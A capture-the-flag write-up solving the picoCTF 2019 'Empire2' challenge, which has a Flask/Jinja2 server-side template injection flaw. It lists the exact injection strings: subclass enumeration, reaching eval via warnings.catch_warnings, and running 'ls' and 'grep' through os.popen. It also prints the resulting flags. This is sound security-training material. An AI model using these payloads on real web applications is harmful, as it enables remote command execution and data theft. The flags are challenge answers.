# Empire2
#### Well done, Agent 513! Our sources say Evil Empire Co is passing secrets around when you log in: https://2019shell1.picoctf.com/problem/13253/, can you help us find it? or http://2019shell1.picoctf.com:13253

This is a flask injection problem. The todo page is still vulnerable just as before. These are the commands I used.

First I tried looking at the config file with `{{config}}` however it only contains a false flag. Instead we have to navigate the server.

We can do this by first injecting `{{[].__class__.__base__.__subclasses__()}}` to list all the subclasses. Then we have to look for the index of "warnings.catch_warnings" which turns out to be 157. We can make sure of this by injecting `{{''.__class__.mro()[1].__subclasses__()[157]}}` 

Then we inject `{{[].__class__.__base__.__subclasses__()[157].__init__.__globals__['__builtins__'].eval('__import__("os").popen("ls").read()')}}` to see the listing of all the files. 

We can inject  `{{[].__class__.__base__.__subclasses__()[157].__init__.__globals__['__builtins__'].eval('__import__("os").popen("grep -r picoCTF app").read()')}}` to search for the flag in the app's files. We get the flag outputted in the your todos tab:

```
Very Urgent: app/config.py: SECRET_KEY = 'picoCTF{your_flag_is_in_another_castle12345678}' app/models.py: secret = db.Column(db.String(128),default="picoCTF{its_a_me_your_flag5c0e0ae8}") app/routes.py: session['dark_secret'] = "picoCTF{its_a_me_your_flag5c0e0ae8}"
```

Flag: picoCTF{its_a_me_your_flag5c0e0ae8}
